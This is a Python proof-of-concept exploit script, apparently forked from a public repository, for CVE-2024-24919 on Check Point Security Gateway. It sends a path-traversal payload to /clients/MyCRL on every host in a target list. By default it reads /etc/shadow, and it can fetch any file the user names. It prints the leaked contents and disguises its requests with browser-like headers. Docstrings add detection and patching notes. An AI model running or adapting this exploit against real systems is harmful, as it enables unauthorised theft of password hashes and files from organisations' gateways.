forked from seed1337/CVE-2024-24919-POC
exploit.py
import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Every request in this script is sent with verify=False, so urllib3 would emit
# an InsecureRequestWarning per call; this turns that warning off globally.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Substrings whose presence in a response body is taken as proof that a
# passwd/shadow-style file came back. The check is a plain substring match,
# so any body that happens to contain one of these strings also matches.
vuln = ["root:", "nobody:"]
def make_request(url, payload=None, headers=None):
    """POST *payload* to *url* and report whether the reply looks like a leaked file.

    The reply is classified as "vulnerable" when the HTTP status is a success
    and the body contains any marker from the module-level ``vuln`` list.
    Everything is reported on stdout; the function always returns ``None``.

    Args:
        url: Full request URL (scheme, host and path).
        payload: Request body; ``None`` sends an empty body.
        headers: Optional dict of HTTP request headers.

    Review notes:
        * ``verify=False`` means the peer certificate is never validated, so
          the reply is not authenticated as coming from the intended host.
        * The marker test does not depend on which file was requested. A body
          without ``root:`` / ``nobody:`` is reported as "not vulnerable", so
          a negative result here is not evidence that a device is patched.
        * On a match the full response body is printed. For the default
          payload that is the contents of /etc/shadow, so terminal scrollback
          and captured output hold password hashes and need handling as such.
    """
    box_top = "╔══════════════════════════════════════════════════════╗"
    box_bottom = "╚══════════════════════════════════════════════════════╝"

    try:
        reply = requests.post(url, data=payload, headers=headers, verify=False)

        # Non-2xx/3xx status: report the code and stop.
        if not reply.ok:
            print(f"[-] {url} responded with status code: {reply.status_code}")
            return

        body = reply.text
        if not any(marker in body for marker in vuln):
            print(f"[-] {url} is not vulnerable")
            return

        print(f"[+] {url} is vulnerable")
        if not payload:
            # Nothing was requested, so there is no file banner to print.
            return

        # Pick the banner title from the payload that was sent.
        if payload.startswith("aCSHELL/../../../../../../../etc/shadow"):
            title = "║ etc/shadow found: ║"
        else:
            title = "║ Your file was found: ║"

        for line in (box_top, title, box_bottom, box_top, f" {body} ", box_bottom):
            print(line)
    except requests.RequestException as e:
        # Connection, TLS and protocol failures raised by requests end up here.
        print(f"Error making request to {url}: {e}")
def main():
    """Parse the command line and probe every URL listed in the ``-l`` file.

    Options:
        -l  Path to a text file with one ``http://`` or ``https://`` base URL
            per line. Lines with any other prefix are reported and skipped.
        -f  Path of the file to request instead of the default ``etc/shadow``;
            it is appended to the fixed traversal prefix.

    Each accepted URL gets ``/clients/MyCRL`` appended and is passed to
    ``make_request`` together with the payload and a fixed header set.

    Detection and response notes (CVE-2024-24919, Check Point Security Gateway):
        * What the target sees is a POST to ``/clients/MyCRL`` whose body
          starts with ``aCSHELL/../``. Path plus body prefix is the indicator
          to search for in gateway and proxy logs.
        * The headers imitate a desktop Firefox request, so User-Agent based
          filtering does not separate this traffic from ordinary browsers.
        * Where such a request received a success response, the contents of
          /etc/shadow may have been disclosed: apply the vendor fix for the
          CVE and rotate the passwords of local accounts on the device.
    """
    parser = argparse.ArgumentParser(description="CVE-2024-24919 POC - erg0sum")
    parser.add_argument("-l", metavar="filename", type=str, help="File containing list of HTTP/HTTPS targets")
    parser.add_argument("-f", metavar="file", type=str, help="File to read for custom payload (May break on multiple targets with unknown files.)")
    args = parser.parse_args()

    # Fixed browser-like header set sent with every request.
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "none",
        "Sec-Fetch-User": "?1",
        "Dnt": "1",
        "Sec-Gpc": "1",
        "Te": "trailers",
        "Connection": "close",
    }

    # Default request body; -f swaps the trailing path for the user's value.
    payload_base = "aCSHELL/../../../../../../../{}"
    payload = (
        payload_base.format(args.f)
        if args.f
        else "aCSHELL/../../../../../../../etc/shadow"
    )

    if not args.l:
        print("Please provide a file containing list of HTTP/HTTPS targets using -l option.")
        return

    try:
        with open(args.l, 'r') as handle:
            targets = [line.strip() for line in handle.readlines()]

        for target in targets:
            # Only absolute http(s) URLs are accepted; anything else is skipped.
            if target.startswith(("http://", "https://")):
                make_request(target + "/clients/MyCRL", payload=payload, headers=headers)
            else:
                print(f"Skipping invalid URL: {target}")
    except FileNotFoundError:
        print(f"Error: File '{args.l}' not found.")
# Run the command-line entry point only when executed as a script,
# not when the module is imported.
if __name__ == "__main__":
    main()